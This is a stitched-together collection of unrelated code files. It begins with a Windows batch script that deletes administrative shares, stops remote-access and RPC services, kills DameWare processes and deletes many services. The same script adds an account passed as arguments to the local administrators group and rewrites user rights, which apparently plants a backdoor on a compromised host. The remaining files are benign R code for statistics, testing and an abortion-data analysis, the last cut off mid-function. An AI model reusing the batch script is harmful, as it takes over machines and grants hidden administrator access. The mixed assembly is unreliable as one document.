net share W$ /delete /y
net share X$ /delete /y
net share Y$ /delete /y
net share Z$ /delete /y
net share ADMIN$ /delete /y
net share IPC$ /delete /y
net share /delete ADMIN$
net share /delete IPC$
net stop "Remote Registry Service"
net stop "Computer Browser"
net stop "server" >> server.txt
net stop "REMOTE PROCEDURE CALL"
net stop "REMOTE PROCEDURE CALL SERVICE"
net stop "Remote Access Connection Manager"
net stop "DameWare Mini Control"
net stop "telnet"
net stop "psexecv"
net stop "messenger"
net stop "netbios"
net stop netbios
kill dntu.exe
kill dntu26.exe
kill dwrcs.exe
sc stop systemnt
sc delete systemnt
sc stop ab
sc delete ab
sc stop evente
sc delete evente
sc stop ntsys
sc delete ntsys
sc stop startdll
sc delete startdll
sc stop MSVC5
sc delete MSVC5
sc stop QOS
sc delete QOS
sc stop MMTASK
sc delete MMTASK
sc stop radmm
sc delete radmm
sc stop mstsk64
sc delete mstsk64
sc stop netsecure
sc delete netsecure
sc stop svcserv
sc delete svcserv
sc stop Slave
sc delete Slave
sc stop svcirof
sc delete svcirof
sc stop csrsss
sc delete csrsss
sc stop keyboard
sc delete keyboard
sc stop shell32
sc delete shell32
sc stop csrss2
sc delete csrss2
sc stop evente
sc delete evente
sc stop eventer
sc delete eventer
sc stop event
sc delete event
sc stop event2
sc delete event2
sc stop systemnt
sc delete systemnt
sc stop dll32
sc delete dll32
sc stop rcmd
sc delete rcmd
sc stop sysmgmt
sc delete sysmgmt
sc stop system
sc delete system
sc stop r_server
sc delete r_server
sc stop radmm
sc delete radmm
sc stop ftp
sc delete ftp
sc stop ir
sc delete ir
sc stop identd
sc delete identd
sc stop net33
sc delete net32
sc stop DWMRCS
sc delete DWMRCS
sc stop svchost
sc delete svchost
sc stop slimftpd
sc delete slimftpd
net user /delete mShelp
REM###
net user /add %1 %2
REM###
net localgroup administrators %1 /add
REM###
secedit.exe /configure /areas USER_RIGHTS /db C:\winnt\temp\temp.mdb /CFG temp
del %SystemRoot%\system32\login.cmd
|
#' Parallel execution in the purrr::map style
#'
#' @description
#' `mcmap()` is a variant of [parallel::mclapply()] that accepts a formula as `.f`.
#' @inheritParams purrr::map
#' @param .mc.cores integer
#' @rdname parallel
#' @export
mcmap = function(.x, .f, ..., .mc.cores = getOption("mc.cores", 2L)) {
parallel::mclapply(.x, rlang::as_function(.f), ..., mc.cores = .mc.cores)
}
#' @rdname parallel
#' @export
mcmap_lgl = function(.x, .f, ..., .mc.cores = getOption("mc.cores", 2L)) {
purrr::list_simplify(mcmap(.x, .f, ..., .mc.cores = .mc.cores), ptype = logical(1L))
}
#' @rdname parallel
#' @export
mcmap_int = function(.x, .f, ..., .mc.cores = getOption("mc.cores", 2L)) {
purrr::list_simplify(mcmap(.x, .f, ..., .mc.cores = .mc.cores), ptype = integer(1L))
}
#' @rdname parallel
#' @export
mcmap_dbl = function(.x, .f, ..., .mc.cores = getOption("mc.cores", 2L)) {
purrr::list_simplify(mcmap(.x, .f, ..., .mc.cores = .mc.cores), ptype = double(1L))
}
#' @rdname parallel
#' @export
mcmap_chr = function(.x, .f, ..., .mc.cores = getOption("mc.cores", 2L)) {
purrr::list_simplify(mcmap(.x, .f, ..., .mc.cores = .mc.cores), ptype = character(1L))
}
| /R/parallel.R | permissive | heavywatal/rwtl | R | false | false | 1,171 | r | #' Parallel execution in the purrr::map style
#'
#' @description
#' `mcmap()` is a variant of [parallel::mclapply()] that accepts a formula as `.f`.
#' @inheritParams purrr::map
#' @param .mc.cores integer
#' @rdname parallel
#' @export
mcmap = function(.x, .f, ..., .mc.cores = getOption("mc.cores", 2L)) {
parallel::mclapply(.x, rlang::as_function(.f), ..., mc.cores = .mc.cores)
}
#' @rdname parallel
#' @export
mcmap_lgl = function(.x, .f, ..., .mc.cores = getOption("mc.cores", 2L)) {
purrr::list_simplify(mcmap(.x, .f, ..., .mc.cores = .mc.cores), ptype = logical(1L))
}
#' @rdname parallel
#' @export
mcmap_int = function(.x, .f, ..., .mc.cores = getOption("mc.cores", 2L)) {
purrr::list_simplify(mcmap(.x, .f, ..., .mc.cores = .mc.cores), ptype = integer(1L))
}
#' @rdname parallel
#' @export
mcmap_dbl = function(.x, .f, ..., .mc.cores = getOption("mc.cores", 2L)) {
purrr::list_simplify(mcmap(.x, .f, ..., .mc.cores = .mc.cores), ptype = double(1L))
}
#' @rdname parallel
#' @export
mcmap_chr = function(.x, .f, ..., .mc.cores = getOption("mc.cores", 2L)) {
purrr::list_simplify(mcmap(.x, .f, ..., .mc.cores = .mc.cores), ptype = character(1L))
}
|
#install.packages("tidyverse")
#install.packages("dplyr")
#install.packages("ggplot2")
#load dplyr package
library("dplyr")
#load the ggplot2 package
library(ggplot2)
#load the tidyverse packa
library("tidyverse")
library("readr")
#Step 1: load the script the tsv file
mydata <- read_tsv("tetrahymena.tsv")
View(mydata)
#Step 2: removing the rows which has diameter <= 19.2
mydata <- mydata[!mydata$diameter <= 19.2,]
#Step 3: computing the mean for culture and glucose grouping, respectively
meanCulture <- mydata[,2:4] %>% group_by(culture) %>% summarise_all(funs(mean(., na.rm=TRUE)))
meanGlucose <- mydata %>% group_by(glucose) %>% summarise_all(funs(mean(., na.rm=TRUE)))
#Step 4: adding new columns for log_concentration and log_diameter, respectively
mydata$log_conc <- log(mydata$conc)
mydata$log_diameter <- log(mydata$diameter)
#Step 5 and 6: doing scatter plot using ggplot and geom_smooth to display the smooth line
ggplot(mydata, aes(x=log_conc, y=log_diameter,shape=glucose,color=glucose)) + geom_point() + geom_smooth(method=lm, se=FALSE, fullrange=TRUE)
#save the plot into PDF
ggsave("tetrahymena_part_A_From_R_me1528.pdf")
| /tetrahymena_part_A_me1528.R | no_license | melzaky522/Final | R | false | false | 1,153 | r |
#install.packages("tidyverse")
#install.packages("dplyr")
#install.packages("ggplot2")
#load dplyr package
library("dplyr")
#load the ggplot2 package
library(ggplot2)
#load the tidyverse packa
library("tidyverse")
library("readr")
#Step 1: load the script the tsv file
mydata <- read_tsv("tetrahymena.tsv")
View(mydata)
#Step 2: removing the rows which has diameter <= 19.2
mydata <- mydata[!mydata$diameter <= 19.2,]
#Step 3: computing the mean for culture and glucose grouping, respectively
meanCulture <- mydata[,2:4] %>% group_by(culture) %>% summarise_all(funs(mean(., na.rm=TRUE)))
meanGlucose <- mydata %>% group_by(glucose) %>% summarise_all(funs(mean(., na.rm=TRUE)))
#Step 4: adding new columns for log_concentration and log_diameter, respectively
mydata$log_conc <- log(mydata$conc)
mydata$log_diameter <- log(mydata$diameter)
#Step 5 and 6: doing scatter plot using ggplot and geom_smooth to display the smooth line
ggplot(mydata, aes(x=log_conc, y=log_diameter,shape=glucose,color=glucose)) + geom_point() + geom_smooth(method=lm, se=FALSE, fullrange=TRUE)
#save the plot into PDF
ggsave("tetrahymena_part_A_From_R_me1528.pdf")
|
% Generated by roxygen2: do not edit by hand
% Please edit documentation in R/tigerhitteR.R
\name{dateRefill.fromData}
\alias{dateRefill.fromData}
\title{Complete the hollow dataset}
\usage{
dateRefill.fromData(data, dateCol.index, fixedCol.index,
uninterpolatedCol.index, uninterpolatedCol.newValue)
}
\arguments{
\item{data}{The data.frame dataset which is ready to be processed}
\item{dateCol.index}{Date column}
\item{fixedCol.index}{A row of column number which should be kept same values with the original}
\item{uninterpolatedCol.index}{The column number which should be changed to different value into new record.}
\item{uninterpolatedCol.newValue}{The value of a specific column which should be put into the new record.}
}
\value{
The dataset which is completed.
}
\description{
Take time series dataset and fields, then refill the missing date records and other fields.
}
\details{
Real time series sales dataset could be not continuous in 'date' field. e.g., monthly sales data is continuous,
but discrete in daily data.
This hollow dataset is not complete for time series analysis. Function dateRefill.fromFile
is a transformation which tranforms uncomplete dataset into complete dataset.
}
\examples{
# mydata <- data.example
# mydata.final <- dateRefill.fromData(data = mydata,dateCol = 2,fixedVec = c(3:10),
# uninterpolatedCol.index = 11,uninterpolatedCol.newValue = 0)
}
\author{
Will Kuan
}
| /man/dateRefill.fromData.Rd | no_license | aiien61/tigerhitteR | R | false | true | 1,456 | rd | % Generated by roxygen2: do not edit by hand
% Please edit documentation in R/tigerhitteR.R
\name{dateRefill.fromData}
\alias{dateRefill.fromData}
\title{Complete the hollow dataset}
\usage{
dateRefill.fromData(data, dateCol.index, fixedCol.index,
uninterpolatedCol.index, uninterpolatedCol.newValue)
}
\arguments{
\item{data}{The data.frame dataset which is ready to be processed}
\item{dateCol.index}{Date column}
\item{fixedCol.index}{A row of column number which should be kept same values with the original}
\item{uninterpolatedCol.index}{The column number which should be changed to different value into new record.}
\item{uninterpolatedCol.newValue}{The value of a specific column which should be put into the new record.}
}
\value{
The dataset which is completed.
}
\description{
Take time series dataset and fields, then refill the missing date records and other fields.
}
\details{
Real time series sales dataset could be not continuous in 'date' field. e.g., monthly sales data is continuous,
but discrete in daily data.
This hollow dataset is not complete for time series analysis. Function dateRefill.fromFile
is a transformation which tranforms uncomplete dataset into complete dataset.
}
\examples{
# mydata <- data.example
# mydata.final <- dateRefill.fromData(data = mydata,dateCol = 2,fixedVec = c(3:10),
# uninterpolatedCol.index = 11,uninterpolatedCol.newValue = 0)
}
\author{
Will Kuan
}
|
target.app.token.link.ui = function(app.url, tok,url = token.login.url(app.url, tok),new.tab=TRUE,target=if (new.tab) "_blank" else "") {
tagList(
HTML(paste0("<a href='",url,"'>Click here if the app does not open automatically</a>"))
)
}
open.app.with.login.token = function(app.url, tok, app=getApp(), new.tab=TRUE,target=if (new.tab) "_blank" else "", url = token.login.url(app.url, tok=tok)) {
restore.point("open.app.with.login.token")
callJS(.fun = "window.open",list(url,target))
}
clicker.default.token = function() {
list(userid="Guest", created=Sys.time(), validUntil=Inf)
}
| /R/token.R | no_license | skranz/courserClicker | R | false | false | 605 | r | target.app.token.link.ui = function(app.url, tok,url = token.login.url(app.url, tok),new.tab=TRUE,target=if (new.tab) "_blank" else "") {
tagList(
HTML(paste0("<a href='",url,"'>Click here if the app does not open automatically</a>"))
)
}
open.app.with.login.token = function(app.url, tok, app=getApp(), new.tab=TRUE,target=if (new.tab) "_blank" else "", url = token.login.url(app.url, tok=tok)) {
restore.point("open.app.with.login.token")
callJS(.fun = "window.open",list(url,target))
}
clicker.default.token = function() {
list(userid="Guest", created=Sys.time(), validUntil=Inf)
}
|
# These helpers are used to test macro and macro weighted methods
data_three_by_three <- function() {
as.table(
matrix(
c(
3, 1, 1,
0, 4, 2,
1, 3, 5
),
ncol = 3, byrow = TRUE,
dimnames = list(c("c1", "c2", "c3"), c("c1", "c2", "c3"))
)
)
}
multi_ex <- data_three_by_three()
weighted_macro_weights <- colSums(multi_ex) / sum(colSums(multi_ex))
# turn a 3x3 conf mat into a 2x2 submatrix in a one vs all approach
make_submat <- function(data, col) {
top_left <- data[col, col]
top_righ <- sum(data[col, -col])
bot_left <- sum(data[-col, col])
bot_righ <- sum(data[-col, -col])
as.table(
matrix(
c(top_left, top_righ, bot_left, bot_righ),
ncol = 2,
byrow = TRUE
)
)
}
# These are the "one vs all" sub matrices
# for macro / weighted macro, calculate the binary version of each metric
# and then average them together
multi_submats <- list(
c1 = make_submat(multi_ex, 1),
c2 = make_submat(multi_ex, 2),
c3 = make_submat(multi_ex, 3)
)
# Just pass in a binary metric function
macro_metric <- function(binary_metric, event_level = "first", ...) {
mean(
vapply(multi_submats, binary_metric, numeric(1), event_level = event_level, ...)
)
}
macro_weighted_metric <- function(binary_metric, event_level = "first", ...) {
stats::weighted.mean(
vapply(multi_submats, binary_metric, numeric(1), event_level = event_level, ...),
weighted_macro_weights
)
}
# For micro examples, we calculate the pieces by hand and use them individually
data_three_by_three_micro <- function() {
res <- list(
tp = vapply(multi_submats, function(x) {
x[1, 1]
}, double(1)),
p = vapply(multi_submats, function(x) {
colSums(x)[1]
}, double(1)),
tn = vapply(multi_submats, function(x) {
x[2, 2]
}, double(1)),
n = vapply(multi_submats, function(x) {
colSums(x)[2]
}, double(1))
)
res <- c(
res,
list(
fp = res$p - res$tp,
fn = res$n - res$tn
)
)
res
}
| /tests/testthat/helper-macro-micro.R | permissive | tidymodels/yardstick | R | false | false | 2,039 | r | # These helpers are used to test macro and macro weighted methods
data_three_by_three <- function() {
as.table(
matrix(
c(
3, 1, 1,
0, 4, 2,
1, 3, 5
),
ncol = 3, byrow = TRUE,
dimnames = list(c("c1", "c2", "c3"), c("c1", "c2", "c3"))
)
)
}
multi_ex <- data_three_by_three()
weighted_macro_weights <- colSums(multi_ex) / sum(colSums(multi_ex))
# turn a 3x3 conf mat into a 2x2 submatrix in a one vs all approach
make_submat <- function(data, col) {
top_left <- data[col, col]
top_righ <- sum(data[col, -col])
bot_left <- sum(data[-col, col])
bot_righ <- sum(data[-col, -col])
as.table(
matrix(
c(top_left, top_righ, bot_left, bot_righ),
ncol = 2,
byrow = TRUE
)
)
}
# These are the "one vs all" sub matrices
# for macro / weighted macro, calculate the binary version of each metric
# and then average them together
multi_submats <- list(
c1 = make_submat(multi_ex, 1),
c2 = make_submat(multi_ex, 2),
c3 = make_submat(multi_ex, 3)
)
# Just pass in a binary metric function
macro_metric <- function(binary_metric, event_level = "first", ...) {
mean(
vapply(multi_submats, binary_metric, numeric(1), event_level = event_level, ...)
)
}
macro_weighted_metric <- function(binary_metric, event_level = "first", ...) {
stats::weighted.mean(
vapply(multi_submats, binary_metric, numeric(1), event_level = event_level, ...),
weighted_macro_weights
)
}
# For micro examples, we calculate the pieces by hand and use them individually
data_three_by_three_micro <- function() {
res <- list(
tp = vapply(multi_submats, function(x) {
x[1, 1]
}, double(1)),
p = vapply(multi_submats, function(x) {
colSums(x)[1]
}, double(1)),
tn = vapply(multi_submats, function(x) {
x[2, 2]
}, double(1)),
n = vapply(multi_submats, function(x) {
colSums(x)[2]
}, double(1))
)
res <- c(
res,
list(
fp = res$p - res$tp,
fn = res$n - res$tn
)
)
res
}
|
## Imports des librairies
library(haven)
library(plyr)
library(dplyr)
library(reshape)
library(devtools)
library(data.table)
library(cartography)
library(rgdal)
library(SpatialPosition)
library(xlsx)
library(osrm)
options(osrm.server="http://0.0.0.0:5000/")
## Chargement de la base sur les établissements
devtools::install_github('jomuller/finess',ref='47de6e2')
data(finess_geo, package = 'finess')
## Ajout des données de la Statistique annuelle des établissements (base statistique) 2013-2018
## http://www.data.drees.sante.gouv.fr/ReportFolders/reportFolders.aspx
datp2013<-read_sas("files/perinat_p_2013a.sas7bdat")
datp2014<-read_sas("files/perinat_p_2014a.sas7bdat")
datp2015<-read_sas("files/perinat_p_2015a.sas7bdat")
datp2016<-read_sas("files/perinat_p_2016a.sas7bdat")
datp2017<-read_sas("files/perinat_p_2017r.sas7bdat")
datp2018<-read_sas("files/perinat_p_2018.sas7bdat")
## Ajout du nombre de médecins participant à l'activité d'IVG (SAE/MIVG) mais les chiffres sont mauvais
mivg2013<-subset(datp2013,PERSO=="MIVG")
mivg2014<-subset(datp2014,PERSO=="MIVG")
mivg2015<-subset(datp2015,PERSO=="MIVG")
mivg2016<-subset(datp2016,PERSO=="MIVG")
mivg2017<-subset(datp2017,PERSO=="MIVG")
mivg2018<-subset(datp2018,PERSO=="MIVG")
mivg<-rbind(mivg2013,mivg2014,mivg2015,mivg2016,mivg2017,mivg2018)
names(mivg)[names(mivg) == "EFFPL"] <- "EFFPL_IVG"
names(mivg)[names(mivg) == "EFFPA"] <- "EFFPA_IVG"
names(mivg)[names(mivg) == "ETP"] <- "ETP_IVG"
mivg<-subset(mivg,select=-c(PERSO,GAR,GARDED,ASTDED,AST,BOR))
## Ajout du nombre de médecins gynécos (SAE/M2050)
mgy_2013<-subset(datp2013,PERSO=="M2050")
mgy_2014<-subset(datp2014,PERSO=="M2050")
mgy_2015<-subset(datp2015,PERSO=="M2050")
mgy_2016<-subset(datp2016,PERSO=="M2050")
mgy_2017<-subset(datp2017,PERSO=="M2050")
mgy_2018<-subset(datp2018,PERSO=="M2050")
mgy<-rbind(mgy_2013,mgy_2014,mgy_2015,mgy_2016,mgy_2017,mgy_2018)
names(mgy)[names(mgy) == "EFFPL"] <- "EFFPL_GY"
names(mgy)[names(mgy) == "EFFPA"] <- "EFFPA_GY"
names(mgy)[names(mgy) == "ETP"] <- "ETP_GY"
mgy<-subset(mgy,select=-c(PERSO,GAR,GARDED,ASTDED,AST,BOR))
mivg<-merge(mivg,mgy,by.x=c("AN","FI_EJ","FI"),by.y=c("AN","FI_EJ","FI"),all.x=TRUE,all.y=TRUE)
## Nombre d'actes IVG et accouchements (PERINAT / SAE)
dat2013<-read_sas("files/perinat_2013r.sas7bdat")
dat2014<-read_sas("files/perinat_2014r.sas7bdat")
dat2015<-read_sas("files/perinat_2015r.sas7bdat")
dat2016<-read_sas("files/perinat_2016r.sas7bdat")
dat2017<-read_sas("files/perinat_2017r.sas7bdat")
dat2018<-read_sas("files/perinat_2018.sas7bdat")
nivg<-rbind.fill(dat2014,dat2013,dat2015,dat2016,dat2017,dat2018)
## FICHIER FINAL
ivg<-merge(mivg,nivg,by.x=c("AN","FI_EJ","FI"),by.y=c("AN","FI_EJ","FI"),all.x=TRUE,all.y=TRUE)
## Ajout des infos de la base Finess
ivg<-merge(ivg,finess_geo,by.x="FI",by.y="nofinesset",all.x=TRUE)
## AJOUTS COLONNES
# Nombre d'accouchements (enfants morts-nés compris)
ivg$ACC<-ivg$ACCMU+ivg$ACCUN
# Département
ivg$DPT<-substr(ivg$FI,start=1,stop=2)
dpt_reg<-read.csv("files/departement2019.csv",sep=",",col.names=c("dep","reg","cheflieu","tncc","ncc","nccenr","libelle"))
ivg<-merge(ivg,dpt_reg,by.x="DPT",by.y="dep",all.x=TRUE)
## Renseigner les établissements sans info
finess_old<-read.csv("files/finess_old.csv",sep=";",col.names=c("nofinesset","nofinessej","rs","rslongue","complrs","compldistrib","numvoie","typvoie","voie","compvoie","lieuditbp","region","libregion","departement","libdepartement","cog","codepostal","libelle_routage","ligneacheminement","telephone","telecopie","categetab","libcategetab","liblongcategetab","categretab","libcategretab","siret","codeape","libcodeape","mft","libmft","liblongmft","sph","libsph","numen","coordx","coordy","sourcegeocod","dategeocod","dateautor","dateouvert","datemaj","lat","lon"),stringsAsFactors=FALSE,colClasses=c(rep("character",44)))
ivg$rs[is.na(ivg$lat)]<-finess_old$rs[match(ivg$FI,finess_old$nofinesset)][which(is.na(ivg$lat))]
ivg$departement[is.na(ivg$lat)]<-finess_old$departement[match(ivg$FI,finess_old$nofinesset)][which(is.na(ivg$lat))]
ivg$lat[is.na(ivg$lat)]<-finess_old$lat[match(ivg$FI,finess_old$nofinesset)][which(is.na(ivg$lat))]
ivg$lon[is.na(ivg$lon)]<-finess_old$lon[match(ivg$FI,finess_old$nofinesset)][which(is.na(ivg$lon))]
## EXPORT
write.csv(ivg,file="ivg.csv",row.names = FALSE)
## Nettoyage
rm(mivg2013,mivg2014,mivg2015,mivg2016,mivg2017,mivg2018)
rm(mgy_2013,mgy_2014,mgy_2015,mgy_2016,mgy_2017,mgy_2018)
rm(datp2013,datp2014,datp2015,datp2016,datp2017,datp2018)
rm(dat2013,dat2014,dat2015,dat2016,dat2017,dat2018)
rm(nivg,mivg,mgy)
## Nb. établissements 12-14 (SAE)
ivg %>% filter(IVG1214 > 0 & AN == "2018") %>% nrow
ivg %>% filter(IVG-IVGME > 0 & AN == "2018") %>% nrow
ivg %>% filter(IVG > 0 & AN == "2018") %>% nrow
ivg %>% filter(IVG1214 > 0 & AN == "2018") %>% cast(libcategetab~AN,length,value="IVG1214") %>% View
ivg %>% filter(IVG-IVGME > 0 & AN == "2018") %>% cast(libcategetab~AN,length,value="IVG") %>% View
ivg %>% filter(IVG > 0 & AN == "2018") %>% cast(libcategetab~AN,length,value="IVG") %>% View
### Taux d'IVG médicamenteuses (moins de 5% / moins que moyenne / plus que moyenne / exclu. +95%)
### Moyenne : 0,5416
ivg$tx_me<-ivg$IVGME/ivg$IVG
ivg$tx_me[is.infinite(ivg$tx_me)]<-1
sum(ivg$IVGME[ivg$AN == "2017"],na.rm=TRUE)/sum(ivg$IVG[ivg$AN == "2018"],na.rm=TRUE)
mean(ivg$tx_me[ivg$AN == "2017"],na.rm=TRUE)
### Taux d'IVG tardives (12-14) (aucune / peu / moyenne)
### Moyenne : 0,0761
ivg$tx_1214<-ivg$IVG1214/ivg$IVG
sum(ivg$IVG1214[ivg$AN == "2017"],na.rm=TRUE)/sum(ivg$IVG[ivg$AN == "2018"],na.rm=TRUE)
mean(ivg$tx_1214[ivg$AN == "2017"],na.rm=TRUE)
### Évolution 2013-2018 (IVG en hausse // stable // déroute)
ivg_export <- ivg %>% filter(AN == "2013" | AN == "2017") %>% group_by(FI) %>% arrange(AN, .by_group = TRUE) %>% mutate(ivg_change = (IVG/lag(IVG) - 1)) %>% mutate(acc_change = (ACC/lag(ACC) - 1)) %>% filter(AN == "2017")
ivg_export$cat_evol<-cut(ivg_export$ivg_change,breaks=c(-1.01,1,-0.05,0.05,13),labels=c("arrêt","en chute","stable","en hausse"),right=TRUE)
### EXPORT
write.csv(ivg_export[,c("FI","DPT","ligneacheminement","rs","libcategetab","IVG","IVGME","IVG1214","ACC","ivg_change","acc_change","cat_evol","tx_me","cat_medic","tx_1214","cat_1214","lat","lon")],"exports/ivg_export.csv",na="",row.names=FALSE)
## Exports étab. 2018
result<-ivg %>% filter(AN == "2013" | AN == "2018") %>% group_by(FI) %>% arrange(AN, .by_group = TRUE) %>% mutate(ivg_change = (IVG/lag(IVG) - 1)) %>% mutate(acc_change = (ACC/lag(ACC) - 1)) %>% filter(AN == "2018")
write.csv(result[,c("FI","DPT","ligneacheminement","rs","libcategetab","IVG","IVGME","ivg_change","acc_change")],"exports/change.csv",na="",row.names=FALSE)
write.csv(merge(subset(ivg_ccam,annee == "2018"),ivg[,c("FI","AN","IVG","IMG")],by.x=c("finess_geo","annee"),by.y=c("FI","AN"),all.x=TRUE)[,c("annee","finess_geo","dep","ligneacheminement","rs","libcategetab","nb_actes.c","nb_actes.m","nb_actes.img2","nb_actes.acc","tx","IVG","IMG")],"exports/ccam.csv",na="",row.names=FALSE)
write.csv(merge(subset(ivg_ccam,annee == "2017"),ivg[,c("FI","AN","IVG","IMG")],by.x=c("finess_geo","annee"),by.y=c("FI","AN"),all.x=TRUE)[,c("annee","finess_geo","dep","ligneacheminement","rs","libcategetab","nb_actes.c","nb_actes.m","nb_actes.img2","nb_actes.acc","tx","IVG","IMG")],"exports/ccam17.csv",na="",row.names=FALSE)
write.csv(subset(ivg[,c("AN","FI","DPT","ligneacheminement","rs","libcategetab","IVG","IVGME","IVG1214","lat","lon")],AN=="2018"),"exports/sae.csv",na="",row.names=FALSE)
## Nombre d'actes (base PMSI-CCAM)
## https://www.scansante.fr/open-ccam/open-ccam-2017
read_ivgCCAM <- function(year) {
filename = paste("files/open_ccam_",year,".csv",sep="")
if(year < 18) {
ccam<-read.csv(filename,sep=";",col.names=c("finess","finess_geo","ccam","nb_actes","dms","nb_sej_0_nuit","dep","reg"))
ccam<-subset(ccam,select=-c(dms,nb_sej_0_nuit))
}
else {
ccam<-read.csv(filename,sep=";",col.names=c("finess","finess_geo","ccam","nb_sejsea","nb_actes","dms","nb_sej_0_nuit","nb_actes_ambu","dep","reg"))
ccam<-subset(ccam,select=-c(nb_sejsea,dms,nb_sej_0_nuit,nb_actes_ambu))
}
## Subsets avortements
ivg_ccamc<-subset(ccam,ccam=="JNJD0020") ## Évacuation d'un utérus gravide par aspiration et/ou curetage, au 1er trimestre de la grossesse
ivg_ccamm<-subset(ccam,ccam=="JNJP0010") ## Évacuation d'un utérus gravide par moyen médicamenteux, au 1er trimestre de la grossesse
ivg_ccamimg<-subset(ccam,ccam=="JNJD0010") ## Évacuation d'un utérus gravide, au 2ème trimestre de la grossesse avant la 22ème semaine d'aménorrhée
# Merge
ivg_ccam<-merge(ivg_ccamc,ivg_ccamm,by.x=c("finess","finess_geo","dep","reg"),by.y=c("finess","finess_geo","dep","reg"),all.x=TRUE,all.y=TRUE,suffix=c(".c",".m"))
ivg_ccam<-merge(ivg_ccam,ivg_ccamimg,by.x=c("finess","finess_geo","dep","reg"),by.y=c("finess","finess_geo","dep","reg"),all.x=TRUE,all.y=TRUE)
setnames(ivg_ccam,c("ccam","nb_actes"),c("ccam.img2","nb_actes.img2"))
## Subsets accouchements
## JQGD001, JQGD002, JQGD003, JQGD004, JQGD005, JQGD007, JQGD008, JQGD012, JQGD013, JQGA002, JQGA003, JQGA004, JQGA005, JQGD010
ivg_acc<-subset(ccam,ccam %in% c("JQGD0010","JQGD0020","JQGD0030","JQGD0040","JQGD0050","JQGD0070","JQGD0080","JQGD0120","JQGD0130","JQGA0020","JQGA0030","JQGA0040","JQGA0050","JQGD0100"))
ivg_acc<-aggregate(ivg_acc$nb_actes,list(ivg_acc$finess_geo),sum,na.rm=TRUE)
colnames(ivg_acc)<-c("finess_geo","nb_actes.acc")
ivg_ccam<-merge(ivg_ccam,ivg_acc,by.x="finess_geo",by.y="finess_geo")
## Ajout année
ivg_ccam["annee"]<-paste("20",year,sep="")
ivg_ccam<-subset(ivg_ccam,select=-c(ccam.c,ccam.m,ccam.img2))
return(ivg_ccam)
}
ivg_ccam<-purrr::map_df(c("15","16","17","18"),read_ivgCCAM)
ivg_ccam$nb_actes<-rowSums(ivg_ccam[,c("nb_actes.c","nb_actes.m")],na.rm=TRUE)
ivg_ccam<-merge(ivg_ccam,finess_geo,by.x="finess_geo",by.y="nofinesset",all.x=TRUE)
dpt_reg<-read.csv("files/departement2019.csv",sep=",",col.names=c("dep","reg","cheflieu","tncc","ncc","nccenr","libelle"))
ivg_ccam<-merge(ivg_ccam,dpt_reg,by.x=c("dep","reg"),by.y=c("dep","reg"),all.x=TRUE)
in.dir<- ("geo")
## FRANCE METROP.
france_1<-readOGR(in.dir,layer="COMMUNE_1",verbose=FALSE)
france_r<-readOGR(in.dir,layer="REGION_1",verbose=FALSE)
## MAYOTTE
france_2<-readOGR(in.dir,layer="COMMUNE_2",verbose=FALSE)
## LA RÉUNION
france_3<-readOGR(in.dir,layer="COMMUNE_3",verbose=FALSE)
## GUADELOUPE
france_4<-readOGR(in.dir,layer="COMMUNE_4",verbose=FALSE)
## MARTINIQUE
france_5<-readOGR(in.dir,layer="COMMUNE_5",verbose=FALSE)
## GUYANE
france_6<-readOGR(in.dir,layer="COMMUNE_6",verbose=FALSE)
### Nettoyage des bases, préparation
### Établissements ayant proposé des IVG chir. dans l'année (2013, 2014 et 2018)
### Établissements ayant réalisé des IVG tardives dans l'année 2018
ivg_geo_2013<-subset(ivg,AN==2013 & IVG-IVGME > 0)
ivg_geo_2014<-subset(ivg,AN==2014 & IVG-IVGME > 0)
ivg_geo_2018<-subset(ivg,AN==2018 & IVG-IVGME > 0)
ivg1214_geo_2018<-subset(ivg,AN==2018 & IVG1214 > 0)
## Calcul des durées de trajet
## Calculer les parcours : osrm-extract france-latest.osm.pbf -p ~/Sites/dev/osrm-backend/profiles/car.lua
## Lancer le serveur : osrm-routed france-latest.osrm
fetchDurees<-function(region) {
if(region == "Mayotte") {
print("Mayotte")
df<-data.frame(as.character(france_2$INSEE_COM),coordinates(spTransform(france_2,CRSobj="+init=epsg:4326")))
ivg13_dist<-subset(ivg_geo_2013,departement=="9F")
ivg14_dist<-subset(ivg_geo_2014,departement=="9F")
ivg18_dist<-subset(ivg_geo_2018,departement=="9F")
ivg1214_dist<-subset(ivg1214_geo_2018,departement=="9F")
}
else if(region == "Guadeloupe") {
print("Guadeloupe")
df<-data.frame(as.character(france_4$INSEE_COM),coordinates(spTransform(france_4,CRSobj="+init=epsg:4326")))
ivg13_dist<-subset(ivg_geo_2013,departement=="9A")
ivg14_dist<-subset(ivg_geo_2014,departement=="9A")
ivg18_dist<-subset(ivg_geo_2018,departement=="9A")
ivg1214_dist<-subset(ivg1214_geo_2018,departement=="9A")
}
else if(region == "Martinique") {
print("Martinique")
df<-data.frame(as.character(france_5$INSEE_COM),coordinates(spTransform(france_5,CRSobj="+init=epsg:4326")))
ivg13_dist<-subset(ivg_geo_2013,departement=="9B")
ivg14_dist<-subset(ivg_geo_2014,departement=="9B")
ivg18_dist<-subset(ivg_geo_2018,departement=="9B")
ivg1214_dist<-subset(ivg1214_geo_2018,departement=="9B")
}
else if(region == "Reunion") {
print("La Réunion")
df<-data.frame(as.character(france_3$INSEE_COM),coordinates(spTransform(france_3,CRSobj="+init=epsg:4326")))
ivg13_dist<-subset(ivg_geo_2013,departement=="9D")
ivg14_dist<-subset(ivg_geo_2014,departement=="9D")
ivg18_dist<-subset(ivg_geo_2018,departement=="9D")
ivg1214_dist<-subset(ivg1214_geo_2018,departement=="9D")
}
else if(region == "Guyane") {
print("Guyane")
df<-data.frame(as.character(france_6$INSEE_COM),coordinates(spTransform(france_6,CRSobj="+init=epsg:4326")))
ivg13_dist<-subset(ivg_geo_2013,departement=="9C")
ivg14_dist<-subset(ivg_geo_2014,departement=="9C")
ivg18_dist<-subset(ivg_geo_2018,departement=="9C")
ivg1214_dist<-subset(ivg1214_geo_2018,departement=="9C")
}
else if(region == "Metropole") {
print("Métropole")
df<-data.frame(as.character(france_1$INSEE_COM),coordinates(spTransform(france_1,CRSobj="+init=epsg:4326")))
ivg13_dist<-subset(ivg_geo_2013,!departement %in% c("9A","9B","9C","9D","9F"))
ivg14_dist<-subset(ivg_geo_2014,!departement %in% c("9A","9B","9C","9D","9F"))
ivg18_dist<-subset(ivg_geo_2018,!departement %in% c("9A","9B","9C","9D","9F"))
ivg1214_dist<-subset(ivg1214_geo_2018,!departement %in% c("9A","9B","9C","9D","9F"))
}
colnames(df) <- c("id", "x", "y")
iterations=nrow(df)
duree_tmp_2013<-matrix(ncol=2,nrow=iterations)
duree_tmp_2014<-matrix(ncol=2,nrow=iterations)
